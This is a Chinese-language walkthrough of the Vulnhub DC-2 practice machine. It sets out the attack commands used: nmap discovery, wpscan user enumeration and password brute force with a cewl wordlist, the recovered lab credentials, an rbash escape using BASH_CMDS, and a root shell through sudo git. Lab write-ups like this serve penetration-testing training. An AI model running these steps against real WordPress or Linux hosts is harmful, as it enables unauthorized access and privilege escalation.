Vulnhub靶机DC系列-DC2(vulnhub靶场高难度靶机)

作者:ximaking
围观群众:7
更新于

Vulnhub靶机DC系列-DC2(vulnhub靶场高难度靶机)

靶场发布时间:2019-3-22

靶场地址:https://www.vulnhub.com/entry/dc-2,311/

靶场描述:

Much like DC-1, DC-2 is another purposely built vulnerable lab for the purpose of gaining experience in the world of penetration testing.

As with the original DC-1, it's designed with beginners in mind.

Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.

Just like with DC-1, there are five flags including the final flag.

And again, just like with DC-1, the flags are important for beginners, but not so important for those who have experience.

In short, the only flag that really counts, is the final flag.

For beginners, Google is your friend. Well, apart from all the privacy concerns etc etc.

I haven't explored all the ways to achieve root, as I scrapped the previous version I had been working on, and started completely fresh apart from the base OS install.

1x0:环境搭建

根据提示 需要把靶机的IP和 域名绑定 修改hosts文件

靶机ip dc-2

2x0:靶机渗透

获取靶机的IP

nmap -sn 192.168.37.0/24

在网段环境中机器 比较多的情况,通多比对MAC地址来判断那个是靶机

使用nmap来查看靶机的端口信息和系统信息等等(-A 时间太长了)

首先去查看80端口的web服务

在网页的底部发现很明显是WordPress

Vulnhub靶机DC系列-DC2(vulnhub靶场高难度靶机)

2x1:flag1

接下来扫描目录(dirb)

后台默认地址

wpscan专门针对wordpress的工具

wpscan --url http://dc-2发现wordpress的版本4.7.10

wpscan --url http://dc-2 --enumerate t 扫描主题

wpscan --url http://dc-2 --enumerate p 扫描插件

wpscan --url http://dc-2 --enumerate u 枚举用户

根据flag1可以用暴力破解使用cewl生成字典

cewl http://dc-2/ > 1.txt

wpscan http://dc-2 --passwords 1.txt 暴力破解(过程很慢)

爆破出来两个账号

jerry/adipiscing

tom/parturient

登录后台 就可以看到flag2

2x2:flag2

提示wordpress行不通的话,换一个点

在nmap扫描有ssh 去尝试ssh连接(注意端口 可以直接用爆破出来的wordpress账号密码登录)

在tom账号的家目录 发现flag3

Vulnhub靶机DC系列-DC2(vulnhub靶场高难度靶机)

在rbash里面,能使用的命令很有限(cat 用不了),尝试很多命令后可以用vi 查看flag3

2x3:flag3

接下来,尝试rbash绕过

查看可以使用的命令 echo $PATH

(cd进不去目录 使用ls直接查看)

使用echo来绕过rbash

BASH_CMDS[a]=/bin/sh;a
$ export PATH=$PATH:/bin/
$ export PATH=$PATH:/usr/bin

2x4:flag4

在jerry的家目录发现flag4

翻译就是:什么都没告诉你

3x0:root提权

查看一下可以使用的root权限命令

sudo可以使用,但是不能到root权限(可以尝试jerry的用户)

在使用su jerry (密码:adipiscing)

jerry用户也不可以直接sudo su

发现可以使用git命令 (root权限)

Vulnhub靶机DC系列-DC2(vulnhub靶场高难度靶机)

使用git命令进行提取

输入!/bin/sh

提权成功:

3x1:最终的flag


靶机结束



Vulnhub靶机DC系列-DC2(vulnhub靶场高难度靶机)

非特殊说明,本文版权归 成益经验网 所有,转载请注明出处.

本文分类: 娱乐

本文标题: Vulnhub靶机DC系列-DC2(vulnhub靶场高难度靶机)

本文网址: http://chengyi0769.com/yule/7283.html

发表评论:

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。